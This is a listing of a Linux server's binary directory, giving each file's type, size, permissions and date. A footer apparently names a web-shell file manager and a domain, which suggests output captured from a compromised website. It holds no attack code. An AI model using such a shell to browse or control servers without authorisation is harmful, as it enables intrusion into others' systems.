mariadb-embedded
application/x-sharedlib
24.05 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-find-rows
text/x-perl
3.35 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-hotcopy
text/x-perl
34.67 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-import
application/x-sharedlib
4.81 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-plugin
application/x-sharedlib
4.53 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-secure-installation
text/x-shellscript
13.65 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-setpermission
text/x-perl
17.7 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-show
application/x-sharedlib
4.81 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-slap
application/x-sharedlib
4.83 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-tzinfo-to-sql
application/x-sharedlib
4.52 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-waitpid
application/x-sharedlib
4.51 MB
-rwxr-xr-x
2026-06-11 11:52:53
mc
application/x-sharedlib
1.3 MB
-rwxr-xr-x
2019-10-18 08:38:40
mcdiff
application/x-sharedlib
1.3 MB
-rwxr-xr-x
2019-10-18 08:38:40
mcedit
application/x-sharedlib
1.3 MB
-rwxr-xr-x
2019-10-18 08:38:40
mcookie
application/x-sharedlib
33.27 KB
-rwxr-xr-x
2026-02-04 08:18:19
mcview
application/x-sharedlib
1.3 MB
-rwxr-xr-x
2019-10-18 08:38:40
md5sum
application/x-sharedlib
45.54 KB
-rwxr-xr-x
2026-03-24 01:05:31
mesg
application/x-sharedlib
16.36 KB
-rwxr-xr-x
2026-02-04 08:18:19
mkdir
application/x-sharedlib
82.7 KB
-rwxr-xr-x
2026-03-24 01:05:31
mkfifo
application/x-sharedlib
66.46 KB
-rwxr-xr-x
2026-03-24 01:05:31
mktemp
application/x-sharedlib
45.66 KB
-rwxr-xr-x
2026-03-24 01:05:31
mogrify
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
montage
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
more
application/x-sharedlib
44.94 KB
-rwxr-xr-x
2026-02-04 08:18:19
msql2mysql
text/x-shellscript
1.41 KB
-rwxr-xr-x
2026-06-11 11:52:53
mv
application/x-sharedlib
143.96 KB
-rwxr-xr-x
2026-03-24 01:05:31
my_print_defaults
application/x-sharedlib
4.51 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysql
application/x-sharedlib
5.26 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysql_config
text/x-shellscript
4.47 KB
-rwxr-xr-x
2026-06-11 11:52:54
mysql_find_rows
text/x-perl
3.35 KB
-rwxr-xr-x
2026-06-11 11:52:53
mysql_waitpid
application/x-sharedlib
4.51 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqlaccess
text/x-perl
109.48 KB
-rwxr-xr-x
2026-06-11 11:52:53
mysqladmin
application/x-sharedlib
4.82 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqlbinlog
application/x-sharedlib
5.08 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqlcheck
application/x-sharedlib
4.82 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqldump
application/x-sharedlib
4.91 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqlimport
application/x-sharedlib
4.81 MB
-rwxr-xr-x
2026-06-11 11:52:53
mysqlshow
application/x-sharedlib
4.81 MB
-rwxr-xr-x
2026-06-11 11:52:53
mytop
text/x-perl
72.03 KB
-rwxr-xr-x
2026-06-11 11:52:53
namei
application/x-sharedlib
33.1 KB
-rwxr-xr-x
2026-02-04 08:18:19
nano
application/x-sharedlib
247.94 KB
-rwxr-xr-x
2024-09-24 02:16:19
neqn
text/x-shellscript
908 B
-rwxr-xr-x
2019-10-13 02:29:37
nice
application/x-sharedlib
37.33 KB
-rwxr-xr-x
2026-03-24 01:05:31
nl
application/x-sharedlib
45.55 KB
-rwxr-xr-x
2026-03-24 01:05:31
nm
application/x-sharedlib
50.38 KB
-rwxr-xr-x
2025-12-18 02:21:35
nohup
application/x-sharedlib
37.41 KB
-rwxr-xr-x
2026-03-24 01:05:31
nproc
application/x-sharedlib
37.41 KB
-rwxr-xr-x
2026-03-24 01:05:31
nroff
text/x-shellscript
3.23 KB
-rwxr-xr-x
2019-10-13 02:29:39
nslookup
application/x-sharedlib
146.26 KB
-rwxr-xr-x
2026-06-08 03:38:10
nsupdate
application/x-sharedlib
73.05 KB
-rwxr-xr-x
2026-06-08 03:38:10
numfmt
application/x-sharedlib
65.64 KB
-rwxr-xr-x
2026-03-24 01:05:31
objcopy
application/x-sharedlib
240.07 KB
-rwxr-xr-x
2025-12-18 02:21:35
objdump
application/x-sharedlib
419.76 KB
-rwxr-xr-x
2025-12-18 02:21:35
od
application/x-sharedlib
73.8 KB
-rwxr-xr-x
2026-03-24 01:05:31
openssl
application/x-sharedlib
745.95 KB
-rwxr-xr-x
2026-07-13 02:12:27
pango-list
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2021-10-08 03:22:06
pango-view
application/x-sharedlib
57.44 KB
-rwxr-xr-x
2021-10-08 03:22:06
passwd
text/x-shellscript
4.41 KB
-rwxr-xr-x
2022-04-18 10:59:33
paste
application/x-sharedlib
37.4 KB
-rwxr-xr-x
2026-03-24 01:05:31
patch
application/x-sharedlib
206.46 KB
-rwxr-xr-x
2020-06-01 03:14:25
pathchk
application/x-sharedlib
37.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
pdf2dsc
text/x-shellscript
698 B
-rwxr-xr-x
2025-06-03 02:48:11
pdf2ps
text/x-shellscript
909 B
-rwxr-xr-x
2025-06-03 02:48:11
perl
application/x-sharedlib
12.43 KB
-rwxr-xr-x
2025-07-28 08:07:20
perl5.26.3
application/x-sharedlib
12.43 KB
-rwxr-xr-x
2025-07-28 08:07:20
perlbug
text/x-perl
44.39 KB
-rwxr-xr-x
2025-07-28 08:08:32
perldoc
text/x-perl
118 B
-rwxr-xr-x
2019-10-13 11:53:57
perlivp
text/x-perl
10.56 KB
-rwxr-xr-x
2025-07-28 08:07:09
perlml
application/x-executable
6.61 KB
-rwxr-xr-x
2025-10-02 07:40:04
perlthanks
text/x-perl
44.39 KB
-rwxr-xr-x
2025-07-28 08:08:32
pg_dump
application/x-sharedlib
399.43 KB
-rwxr-xr-x
2024-02-27 08:25:00
pg_dumpall
application/x-sharedlib
107.11 KB
-rwxr-xr-x
2024-02-27 08:25:00
pg_restore
application/x-sharedlib
173.34 KB
-rwxr-xr-x
2024-02-27 08:25:00
pgrep
application/x-sharedlib
28.84 KB
-rwxr-xr-x
2023-10-14 08:31:02
php
text/x-perl
937 B
-rwxr-xr-x
2025-04-03 11:08:35
pic
application/x-sharedlib
293.84 KB
-rwxr-xr-x
2019-10-13 02:29:41
piconv
text/x-perl
8.08 KB
-rwxr-xr-x
2019-10-13 08:46:10
pinentry
text/x-shellscript
2.35 KB
-rwxr-xr-x
2018-08-12 05:18:10
pinentry-curses
application/x-sharedlib
77.89 KB
-rwxr-xr-x
2019-11-24 05:39:34
ping
application/x-sharedlib
66.13 KB
-rwxr-xr-x
2023-10-14 05:19:01
pinky
application/x-sharedlib
41.46 KB
-rwxr-xr-x
2026-03-24 01:05:31
pkg-config
application/x-sharedlib
40.04 KB
-rwxr-xr-x
2019-10-13 06:57:31
pkgconf
application/x-sharedlib
40.04 KB
-rwxr-xr-x
2019-10-13 06:57:31
pkill
application/x-sharedlib
28.84 KB
-rwxr-xr-x
2023-10-14 08:31:02
pl2pm
text/x-perl
4.43 KB
-rwxr-xr-x
2025-07-28 08:08:16
pmap
application/x-sharedlib
32.78 KB
-rwxr-xr-x
2023-10-14 08:31:02
pod2html
text/x-perl
4.04 KB
-rwxr-xr-x
2025-07-28 08:08:32
pod2man
text/x-perl
14.68 KB
-rwxr-xr-x
2019-10-13 02:12:32
pod2text
text/x-perl
10.55 KB
-rwxr-xr-x
2019-10-13 02:12:32
pod2usage
text/x-perl
3.86 KB
-rwxr-xr-x
2019-10-13 11:57:18
podchecker
text/x-perl
3.57 KB
-rwxr-xr-x
2019-10-13 11:46:35
podselect
text/x-perl
2.47 KB
-rwxr-xr-x
2019-10-13 11:52:55
post-grohtml
application/x-sharedlib
238.73 KB
-rwxr-xr-x
2019-10-13 02:29:41
pr
application/x-sharedlib
82.15 KB
-rwxr-xr-x
2026-03-24 01:05:31
pre-grohtml
application/x-sharedlib
130.55 KB
-rwxr-xr-x
2019-10-13 02:29:41
precat
text/x-shellscript
5.52 KB
-rwxr-xr-x
2022-04-18 03:10:50
preunzip
text/x-shellscript
5.52 KB
-rwxr-xr-x
2022-04-18 03:10:50
prezip
text/x-shellscript
5.52 KB
-rwxr-xr-x
2022-04-18 03:10:50
prezip-bin
application/x-sharedlib
11.98 KB
-rwxr-xr-x
2022-04-18 03:10:53
printenv
application/x-sharedlib
33.32 KB
-rwxr-xr-x
2026-03-24 01:05:31
printf
application/x-sharedlib
53.56 KB
-rwxr-xr-x
2026-03-24 01:05:31
prove
text/x-perl
13.24 KB
-rwxr-xr-x
2019-10-13 12:42:34
ps
application/x-sharedlib
134.75 KB
-rwxr-xr-x
2023-10-14 08:31:02
ps2ascii
text/x-shellscript
631 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2epsi
text/x-shellscript
2.69 KB
-rwxr-xr-x
2025-06-03 02:48:11
ps2pdf
text/x-shellscript
272 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2pdf12
text/x-shellscript
215 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2pdf13
text/x-shellscript
215 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2pdf14
text/x-shellscript
215 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2pdfwr
text/x-shellscript
1.07 KB
-rwxr-xr-x
2025-06-03 02:48:11
ps2ps
text/x-shellscript
647 B
-rwxr-xr-x
2025-06-03 02:48:11
ps2ps2
text/x-shellscript
669 B
-rwxr-xr-x
2025-06-03 02:48:11
psql
application/x-sharedlib
644.33 KB
-rwxr-xr-x
2024-02-27 08:25:00
ptx
application/x-sharedlib
78 KB
-rwxr-xr-x
2026-03-24 01:05:31
pwd
application/x-sharedlib
37.42 KB
-rwxr-xr-x
2026-03-24 01:05:31
pwdx
application/x-sharedlib
12.68 KB
-rwxr-xr-x
2023-10-14 08:31:02
python2
application/x-sharedlib
7.84 KB
-rwxr-xr-x
2024-04-10 04:58:50
python2.7
application/x-sharedlib
7.84 KB
-rwxr-xr-x
2024-04-10 04:58:50
python3
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2026-07-14 04:22:29
python3.6
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2026-07-14 04:22:29
python3.6m
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2026-07-14 04:22:29
ranlib
application/x-sharedlib
61.97 KB
-rwxr-xr-x
2025-12-18 02:21:35
readelf
application/x-sharedlib
624.54 KB
-rwxr-xr-x
2025-12-18 02:21:35
readlink
application/x-sharedlib
45.88 KB
-rwxr-xr-x
2026-03-24 01:05:31
realpath
application/x-sharedlib
49.94 KB
-rwxr-xr-x
2026-03-24 01:05:31
recode
application/x-sharedlib
47.03 KB
-rwxr-xr-x
2019-10-18 03:18:02
reindexdb
application/x-sharedlib
70.32 KB
-rwxr-xr-x
2024-02-27 08:25:00
rename
application/x-sharedlib
16.5 KB
-rwxr-xr-x
2026-02-04 08:18:19
renew-dummy-cert
text/x-shellscript
725 B
-rwxr-xr-x
2026-07-13 02:12:11
renice
application/x-sharedlib
16.46 KB
-rwxr-xr-x
2026-02-04 08:18:19
replace
application/x-sharedlib
4.49 MB
-rwxr-xr-x
2026-06-11 11:52:53
reset
application/x-sharedlib
24.76 KB
-rwxr-xr-x
2023-10-14 06:54:49
rev
application/x-sharedlib
12.46 KB
-rwxr-xr-x
2026-02-04 08:18:19
rm
application/x-sharedlib
70.38 KB
-rwxr-xr-x
2026-03-24 01:05:31
rmdir
application/x-sharedlib
45.46 KB
-rwxr-xr-x
2026-03-24 01:05:31
rnano
application/x-sharedlib
247.94 KB
-rwxr-xr-x
2024-09-24 02:16:19
rsync
application/x-sharedlib
522.35 KB
-rwxr-xr-x
2026-06-16 05:52:34
ruby
application/x-sharedlib
11.84 KB
-rwxr-xr-x
2026-07-03 10:44:05
run-with-aspell
text/x-shellscript
85 B
-rwxr-xr-x
2022-04-18 03:10:50
rvi
application/x-sharedlib
1.13 MB
-rwxr-xr-x
2026-07-13 08:08:02
rview
application/x-sharedlib
1.13 MB
-rwxr-xr-x
2026-07-13 08:08:02
rvim
application/x-sharedlib
2.93 MB
-rwxr-xr-x
2026-07-13 08:08:02
scalar
application/x-sharedlib
2.18 MB
-rwxr-xr-x
2025-07-23 06:59:57
scl
application/x-sharedlib
36.87 KB
-rwxr-xr-x
2023-04-01 04:10:31
scl_enabled
text/x-shellscript
258 B
-rwxr-xr-x
2017-08-25 08:23:02
scl_source
text/x-shellscript
1.82 KB
-rwxr-xr-x
2023-04-01 04:10:31
scp
application/x-sharedlib
102.84 KB
-rwxr-xr-x
2026-05-04 08:25:30
screen
application/x-sharedlib
482.46 KB
-rwxr-xr-x
2021-05-05 10:04:06
script
application/x-sharedlib
36.8 KB
-rwxr-xr-x
2026-02-04 08:18:19
sdiff
application/x-sharedlib
105.33 KB
-rwxr-xr-x
2020-05-04 03:15:14
sed
application/x-sharedlib
115.27 KB
-rwxr-xr-x
2026-04-14 07:22:48
selectorctl
text/x-python
7.63 KB
-rwxr-xr-x
2026-07-01 09:06:54
seq
application/x-sharedlib
53.45 KB
-rwxr-xr-x
2026-03-24 01:05:31
setsid
application/x-sharedlib
16.38 KB
-rwxr-xr-x
2026-02-04 08:18:19
setterm
application/x-sharedlib
45.13 KB
-rwxr-xr-x
2026-02-04 08:18:19
sftp
application/x-sharedlib
159.74 KB
-rwxr-xr-x
2026-05-04 08:25:30
sh
application/x-sharedlib
1.1 MB
-rwxr-xr-x
2025-08-26 08:48:39
sha1sum
application/x-sharedlib
45.55 KB
-rwxr-xr-x
2026-03-24 01:05:31
sha224sum
application/x-sharedlib
45.58 KB
-rwxr-xr-x
2026-03-24 01:05:31
sha256sum
application/x-sharedlib
45.58 KB
-rwxr-xr-x
2026-03-24 01:05:31
sha384sum
application/x-sharedlib
45.59 KB
-rwxr-xr-x
2026-03-24 01:05:31
sha512sum
application/x-sharedlib
45.59 KB
-rwxr-xr-x
2026-03-24 01:05:31
shred
application/x-sharedlib
61.85 KB
-rwxr-xr-x
2026-03-24 01:05:31
shuf
application/x-sharedlib
58.09 KB
-rwxr-xr-x
2026-03-24 01:05:31
size
application/x-sharedlib
33.25 KB
-rwxr-xr-x
2025-12-18 02:21:35
skill
application/x-sharedlib
28.8 KB
-rwxr-xr-x
2023-10-14 08:31:02
slabtop
application/x-sharedlib
20.84 KB
-rwxr-xr-x
2023-10-14 08:31:02
sleep
application/x-sharedlib
37.4 KB
-rwxr-xr-x
2026-03-24 01:05:31
snice
application/x-sharedlib
28.8 KB
-rwxr-xr-x
2023-10-14 08:31:02
soelim
application/x-sharedlib
42.55 KB
-rwxr-xr-x
2019-10-13 02:29:41
sort
application/x-sharedlib
123.48 KB
-rwxr-xr-x
2026-03-24 01:05:31
spell
text/x-shellscript
122 B
-rwxr-xr-x
2022-04-18 03:10:51
splain
text/x-perl
18.7 KB
-rwxr-xr-x
2025-07-28 08:08:32
split
application/x-sharedlib
58.05 KB
-rwxr-xr-x
2026-03-24 01:05:31
sprof
application/x-sharedlib
28.67 KB
-rwxr-xr-x
2026-06-29 04:18:43
sqlite3
application/x-sharedlib
1.28 MB
-rwxr-xr-x
2025-07-29 01:27:56
ssh
application/x-sharedlib
757.61 KB
-rwxr-xr-x
2026-05-04 08:25:30
ssh-add
application/x-sharedlib
346.13 KB
-rwxr-xr-x
2026-05-04 08:25:30
ssh-agent
application/x-sharedlib
325.59 KB
-rwxr-xr-x
2026-05-04 08:25:30
ssh-copy-id
text/x-shellscript
10.44 KB
-rwxr-xr-x
2026-05-04 08:25:29
ssh-keygen
application/x-sharedlib
427.17 KB
-rwxr-xr-x
2026-05-04 08:25:30
ssh-keyscan
application/x-sharedlib
432.59 KB
-rwxr-xr-x
2026-05-04 08:25:30
stat
application/x-sharedlib
86.16 KB
-rwxr-xr-x
2026-03-24 01:05:31
stdbuf
application/x-sharedlib
49.5 KB
-rwxr-xr-x
2026-03-24 01:05:31
strace
application/x-sharedlib
1.94 MB
-rwxr-xr-x
2025-01-28 01:32:17
stream
application/x-sharedlib
11.87 KB
-rwxr-xr-x
2026-06-12 10:06:24
strings
application/x-sharedlib
37.43 KB
-rwxr-xr-x
2025-12-18 02:21:35
strip
application/x-sharedlib
240.09 KB
-rwxr-xr-x
2025-12-18 02:21:35
stty
application/x-sharedlib
77.61 KB
-rwxr-xr-x
2026-03-24 01:05:31
sum
application/x-sharedlib
45.53 KB
-rwxr-xr-x
2026-03-24 01:05:31
sync
application/x-sharedlib
37.35 KB
-rwxr-xr-x
2026-03-24 01:05:31
tabs
application/x-sharedlib
16.55 KB
-rwxr-xr-x
2023-10-14 06:54:49
tac
application/x-sharedlib
41.49 KB
-rwxr-xr-x
2026-03-24 01:05:31
tail
application/x-sharedlib
74.13 KB
-rwxr-xr-x
2026-03-24 01:05:31
tar
application/x-sharedlib
448.99 KB
-rwxr-xr-x
2025-08-26 08:57:37
taskset
application/x-sharedlib
37.26 KB
-rwxr-xr-x
2026-02-04 08:18:19
tbl
application/x-sharedlib
154.61 KB
-rwxr-xr-x
2019-10-13 02:29:41
tclsh
application/x-sharedlib
9.04 KB
-rwxr-xr-x
2019-10-12 12:25:32
tclsh8.6
application/x-sharedlib
9.04 KB
-rwxr-xr-x
2019-10-12 12:25:32
tee
application/x-sharedlib
41.48 KB
-rwxr-xr-x
2026-03-24 01:05:31
test
application/x-sharedlib
53.55 KB
-rwxr-xr-x
2026-03-24 01:05:31
tic
application/x-sharedlib
85.31 KB
-rwxr-xr-x
2023-10-14 06:54:49
timeout
application/x-sharedlib
41.85 KB
-rwxr-xr-x
2026-03-24 01:05:31
tload
application/x-sharedlib
16.76 KB
-rwxr-xr-x
2023-10-14 08:31:02
tmpwatch
application/x-sharedlib
35.47 KB
-rwxr-xr-x
2019-10-12 11:32:29
toe
application/x-sharedlib
16.45 KB
-rwxr-xr-x
2023-10-14 06:54:49
top
application/x-sharedlib
121.7 KB
-rwxr-xr-x
2023-10-14 08:31:02
touch
application/x-sharedlib
93.94 KB
-rwxr-xr-x
2026-03-24 01:05:31
tput
application/x-sharedlib
24.8 KB
-rwxr-xr-x
2023-10-14 06:54:49
tr
application/x-sharedlib
49.63 KB
-rwxr-xr-x
2026-03-24 01:05:31
traceroute
application/x-sharedlib
70.97 KB
-rwxr-xr-x
2025-03-11 07:45:53
troff
application/x-sharedlib
805.02 KB
-rwxr-xr-x
2019-10-13 02:29:41
true
application/x-sharedlib
33.33 KB
-rwxr-xr-x
2026-03-24 01:05:31
truncate
application/x-sharedlib
41.36 KB
-rwxr-xr-x
2026-03-24 01:05:31
tset
application/x-sharedlib
24.76 KB
-rwxr-xr-x
2023-10-14 06:54:49
tsort
application/x-sharedlib
41.49 KB
-rwxr-xr-x
2026-03-24 01:05:31
tty
application/x-sharedlib
33.31 KB
-rwxr-xr-x
2026-03-24 01:05:31
tzselect
text/x-shellscript
15.01 KB
-rwxr-xr-x
2026-06-29 04:07:14
uapi
text/x-shellscript
4.41 KB
-rwxr-xr-x
2026-06-11 09:41:50
ul
application/x-sharedlib
20.59 KB
-rwxr-xr-x
2026-02-04 08:18:19
uname
application/x-sharedlib
37.33 KB
-rwxr-xr-x
2026-03-24 01:05:31
unexpand
application/x-sharedlib
45.61 KB
-rwxr-xr-x
2026-03-24 01:05:31
uniq
application/x-sharedlib
49.64 KB
-rwxr-xr-x
2026-03-24 01:05:31
unlink
application/x-sharedlib
33.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
unzip
application/x-sharedlib
201.88 KB
-rwxr-xr-x
2025-06-03 02:10:12
unzipsfx
application/x-sharedlib
101.48 KB
-rwxr-xr-x
2025-06-03 02:10:12
uptime
application/x-sharedlib
12.59 KB
-rwxr-xr-x
2023-10-14 08:31:02
users
application/x-sharedlib
37.4 KB
-rwxr-xr-x
2026-03-24 01:05:31
utmpdump
application/x-sharedlib
28.66 KB
-rwxr-xr-x
2026-02-04 08:18:19
vacuumdb
application/x-sharedlib
78.46 KB
-rwxr-xr-x
2024-02-27 08:25:00
vdir
application/x-sharedlib
139.91 KB
-rwxr-xr-x
2026-03-24 01:05:31
vi
application/x-sharedlib
1.13 MB
-rwxr-xr-x
2026-07-13 08:08:02
view
application/x-sharedlib
1.13 MB
-rwxr-xr-x
2026-07-13 08:08:02
vim
application/x-sharedlib
2.93 MB
-rwxr-xr-x
2026-07-13 08:08:02
vimdiff
application/x-sharedlib
2.93 MB
-rwxr-xr-x
2026-07-13 08:08:02
vimtutor
text/x-shellscript
2.07 KB
-rwxr-xr-x
2026-07-13 08:07:58
vmstat
application/x-sharedlib
36.79 KB
-rwxr-xr-x
2023-10-14 08:31:02
watch
application/x-sharedlib
29.19 KB
-rwxr-xr-x
2023-10-14 08:31:02
wc
application/x-sharedlib
49.64 KB
-rwxr-xr-x
2026-03-24 01:05:31
wget
application/x-sharedlib
521.41 KB
-rwxr-xr-x
2024-08-13 10:22:56
whereis
application/x-sharedlib
29.27 KB
-rwxr-xr-x
2026-02-04 08:18:19
which
application/x-sharedlib
29.38 KB
-rwxr-xr-x
2025-08-26 08:54:45
who
application/x-sharedlib
53.59 KB
-rwxr-xr-x
2026-03-24 01:05:31
whoami
application/x-sharedlib
33.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
word-list-compress
application/x-sharedlib
11.99 KB
-rwxr-xr-x
2022-04-18 03:10:53
x86_64-redhat-linux-c++
1.21 MB
-rwxr-x---
2025-08-26 09:47:24
x86_64-redhat-linux-g++
1.21 MB
-rwxr-x---
2025-08-26 09:47:24
x86_64-redhat-linux-gcc
1.21 MB
-rwxr-x---
2025-08-26 09:47:26
x86_64-redhat-linux-gcc-8
1.21 MB
-rwxr-x---
2025-08-26 09:47:26
xargs
application/x-sharedlib
74.11 KB
-rwxr-xr-x
2025-12-18 02:57:01
xmlcatalog
application/x-sharedlib
20.38 KB
-rwxr-xr-x
2026-07-08 03:05:30
xmllint
application/x-sharedlib
73.38 KB
-rwxr-xr-x
2026-07-08 03:05:30
xmlwf
application/x-sharedlib
36.97 KB
-rwxr-xr-x
2026-06-03 11:35:13
xsltproc
application/x-sharedlib
28.47 KB
-rwxr-xr-x
2026-06-16 04:39:24
xsubpp
text/x-perl
4.96 KB
-rwxr-xr-x
2019-10-13 08:58:35
xxd
application/x-sharedlib
20.54 KB
-rwxr-xr-x
2026-07-13 08:08:02
yes
application/x-sharedlib
33.37 KB
-rwxr-xr-x
2026-03-24 01:05:31
zcat
text/x-shellscript
1.94 KB
-rwxr-xr-x
2022-04-27 05:49:28
zcmp
text/x-shellscript
1.64 KB
-rwxr-xr-x
2022-04-27 05:49:28
zdiff
text/x-shellscript
5.74 KB
-rwxr-xr-x
2022-04-27 05:49:28
zegrep
text/x-shellscript
29 B
-rwxr-xr-x
2022-04-27 05:49:28
zfgrep
text/x-shellscript
29 B
-rwxr-xr-x
2022-04-27 05:49:28
zforce
text/x-shellscript
2.03 KB
-rwxr-xr-x
2022-04-27 05:49:28
zgrep
text/x-shellscript
7.4 KB
-rwxr-xr-x
2022-04-27 05:49:28
zip
application/x-sharedlib
229 KB
-rwxr-xr-x
2019-10-11 01:11:04
zipcloak
application/x-sharedlib
102.91 KB
-rwxr-xr-x
2019-10-11 01:11:04
zipgrep
text/x-shellscript
2.88 KB
-rwxr-xr-x
2008-10-10 05:40:36
zipinfo
application/x-sharedlib
201.88 KB
-rwxr-xr-x
2025-06-03 02:10:12
zipnote
application/x-sharedlib
97.76 KB
-rwxr-xr-x
2019-10-11 01:11:04
zipsplit
application/x-sharedlib
97.76 KB
-rwxr-xr-x
2019-10-11 01:11:04
zless
text/x-shellscript
2.15 KB
-rwxr-xr-x
2022-04-27 05:49:28
zmore
text/x-shellscript
1.8 KB
-rwxr-xr-x
2022-04-27 05:49:28
znew
text/x-shellscript
4.45 KB
-rwxr-xr-x
2022-04-27 05:49:28
zsoelim
application/x-sharedlib
42.55 KB
-rwxr-xr-x
2019-10-13 02:29:41
~ ACUPOFTEA - baroun-eg.com